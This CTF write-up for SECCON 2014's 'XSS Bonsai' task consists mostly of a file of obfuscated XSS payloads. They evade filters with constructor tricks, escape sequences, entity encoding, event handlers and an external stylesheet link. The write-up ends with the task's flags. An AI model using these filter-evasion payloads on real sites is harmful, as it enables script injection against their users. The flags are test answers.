SECCON CTF 2014 Online Qualifications, XSS Bonsai writeup

bonsai-xss.js

";hoge14='constructorhoge14'.slice(84645-84645,84656-84645);hoge15='alerthoge14'.slice(84645-84645,84650-84645);hoge16='XSShoge14'.slice(84645-84645,84648-84645);[][hoge14][hoge14](hoge15+'(\''+hoge16+'\')')()//
\";hoge17='constructorhoge17'.substr(45998-45998,46009-45998);hoge18='alerthoge17'.substr(45998-45998,46003-45998);hoge19='XSShoge17'.substr(45998-45998,46001-45998);[][hoge17][hoge17](hoge18+'(\''+hoge19+'\')')()//
',(hoge20='constructorhogee'.replace('hogee',''),hoge21='alerthogee'.replace('hogee',''),hoge22='XSShogee'.replace('hogee',''),[][hoge20][hoge20](hoge21+'(\''+hoge22+'\')')()),'
")};hoge30=88831-88831;hoge31='cccchoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'nnnnhoge30'.split('')[hoge30]+'sssshoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'uuuuhoge30'.split('')[hoge30]+'cccchoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30];hoge32='aaaahoge30'.split('')[hoge30]+'llllhoge30'.split('')[hoge30]+'eeeehoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30];hoge33='XXXXhoge30'.split('')[hoge30]+'SSSShoge30'.split('')[hoge30]+'SSSShoge30'.split('')[hoge30];[][hoge31][hoge31](hoge32+'(\''+hoge33+'\')')();while(false){("
\x3cfont/\x6fnmouseup=\x61lert('\x58SS')\x3estage5
\74font/\157nmouseup=\141lert('\130SS')\76stage6
<font/onmouseup="hoge81='constructorhoge81'['\u0073lice'](35867-35867,35878-35867);hoge82='alerthoge81'['\u0073lice'](35867-35867,35872-35867);hoge83='XSShoge81'['\u0073lice'](35867-35867,35870-35867);[][hoge81][hoge81](hoge82+'(\''+hoge83+'\')')()">stage8
<textarea/onselect="barr101='constructorbarr101'['\x73lice'](96665-96665,96676-96665);barr102='alertbarr101'['\x73lice'](96665-96665,96670-96665);barr103='XSSbarr101'['\x73lice'](96665-96665,96668-96665);[][barr101][barr101](barr102+'(\''+barr103+'\')')()">
<marquee/onstart="barr111='constructorbarr111'['\163lice'](26385-26385,26396-26385);barr112='alertbarr111'['\163lice'](26385-26385,26390-26385);barr113='XSSbarr111'['\163lice'](26385-26385,26388-26385);[][barr111][barr111](barr112+'(\''+barr113+'\')')()">stage10
<select/onkeypress="barr121='constructorbarr121'['\u0073ubstr'](38198-38198,38209-38198);barr122='alertbarr121'['\u0073ubstr'](38198-38198,38203-38198);barr124='XSSbarr121'['\u0073ubstr'](38198-38198,38201-38198);[][barr121][barr121](barr122+'(\''+barr124+'\')')()">stage11
<big/onclick="barr131='constructorbarr131'['\x73ubstr'](18916-18916,18927-18916);barr132='alertbarr131'['\x73ubstr'](18916-18916,18921-18916);barr133='XSSbarr131'['\x73ubstr'](18916-18916,18919-18916);[][barr131][barr131](barr132+'(\''+barr133+'\')')()">stage12
<button/onfocusin="barr144='constructorbarr144'['\163ubstr'](3873-3873,3884-3873);barr142='alertbarr144'['\163ubstr'](3873-3873,3878-3873);barr143='XSSbarr144'['\163ubstr'](3873-3873,3876-3873);[][barr144][barr144](barr142+'(\''+barr143+'\')')()">stage13
<small/onmousedown="barr155='constructorbarr155'['\u0072eplace']('barr155','');barr152='alertbarr155'['\u0072eplace']('barr155','');barr153='XSSbarr155'['\u0072eplace']('barr155','');[][barr155][barr155](barr152+'(\''+barr153+'\')')()">stage14
<input/onPaste="barr161='constructorbarr165'['\x72eplace']('barr165','');barr166='alertbarr165'['\x72eplace']('barr165','');barr167='XSSbarr165'['\x72eplace']('barr165','');[][barr161][barr161](barr166+'(\''+barr167+'\')')()">stage15
<xmp/onCopy="barr171='constructorbarr174'['\162eplace']('barr174','');barr172='alertbarr174'['\162eplace']('barr174','');barr173='XSSbarr174'['\162eplace']('barr174','');[][barr171][barr171](barr172+'(\''+barr173+'\')')()">
<div/onDblClick="hoge41='constructorhoge41'['sl'+'ice'](82124-82124,82135-82124);hoge44='alerthoge41'['sl'+'ice'](82124-82124,82129-82124);hoge43='XSShoge41'['sl'+'ice'](82124-82124,82127-82124);[][hoge41][hoge41](hoge44+'(\''+hoge43+'\')')()">stage17
<span/onmouseover="hoge54='constructorhoge54'['su'+'bstr'](48363-48363,48375-48364);hoge52='alerthoge54'['su'+'bstr'](48363-48363,48368-48363);hoge53='XSShoge54'['su'+'bstr'](48363-48363,48366-48363);[][hoge54][hoge54](hoge52+'(\''+hoge53+'\')')()">stage18
<dir/onmouseenter="hoge61='constructorhoge64'['rep'+'lace']('hoge64','');hoge62='alerthoge64'['rep'+'lace']('hoge64','');hoge63='XSShoge64'['rep'+'lace']('hoge64','');[][hoge61][hoge61](hoge62+'(\''+hoge63+'\')')()">stage19
<blockquote/onmouseout="hoge90=62536-62536;hoge91='cccchoge90'['sp'+'lit']('')[hoge90]+'oooohoge90'['sp'+'lit']('')[hoge90]+'nnnnhoge90'['sp'+'lit']('')[hoge90]+'sssshoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90]+'uuuuhoge90'['sp'+'lit']('')[hoge90]+'cccchoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90]+'oooohoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90];hoge92='aaaahoge90'['sp'+'lit']('')[hoge90]+'llllhoge90'['sp'+'lit']('')[hoge90]+'eeeehoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90];hoge93='XXXXhoge90'['sp'+'lit']('')[hoge90]+'SSSShoge90'['sp'+'lit']('')[hoge90]+'SSSShoge90'['sp'+'lit']('')[hoge90];[][hoge91][hoge91](hoge92+'(\''+hoge93+'\')')()">stage20
<strong/onMouseMove="&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000039;&#000088;&#000083;&#000083;&#000039;&#000041;">stage21
<body/onscroll="&#00097;&#000108;&#000101;&#000114;&#000116;&#00040;&#00039;&#00088;&#00083;&#00083;&#00039;&#00041;">stage22
<img/src="./"/onerror="&#0097;&#00108;&#00101;&#00114;&#00116;&#0040;&#0039;&#0088;&#0083;&#0083;&#0039;&#0041;">stage23
<label/onDragEnd="&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;">stage24
<var/onContextMenu="&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000027;&#x000058;&#x000053;&#x000053;&#x000027;&#x000029;">stage25
<TABLE/BACKGROUND="javascript:&#x00061;&#x0006c;&#x00065;&#x00072;&#x00074;&#x00028;&#x00027;&#x00058;&#x00053;&#x00053;&#x00027;&#x00029;">
<center/ondrag="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">center
<script>hoge71='const'+'ructor';hoge72=hoge71[hoge71]['fromChar'+'Code'];hoge73=hoge72(64951-64854,64962-64854,64955-64854,64968-64854,65872-65756,64894-64854,64893-64854,64942-64854,64937-64854,64937-64854,64893-64854,64895-64854);[][hoge71][hoge71](hoge73)()</script>
<link/rel="stylesheet"/href="http://8ant.org/asdfqwer.css">
<pre/style="expression:expression(alert('XSS'))">

// this is not used
<em/onMouseLeave="[].constructor.constructor('al'+'ert(/X'+'SS/.source)')()">em

writeup.md

XSS Bonsai is a task to generate a xss code.

Once I submit a code, the alpha numeric words in the code becomes disabled.

These links are the old writeups of the xss problems in seccon, and some of them are able to use :)

• https://gist.github.com/tyage/df5d8252ea93953785f5
• https://gist.github.com/akiym/9c9f903d824fddcaf2c8

I generate a bonsai-xss.js that solve the problem.

Each line solve each problem (ex. line 1 solves problem 1).

Flag is: SECCON{1a93W8efc707eeecebc5bba619eb}

(Half way flag is: SECCON{8e607c8dfce7bb248099wfe9a5ed99})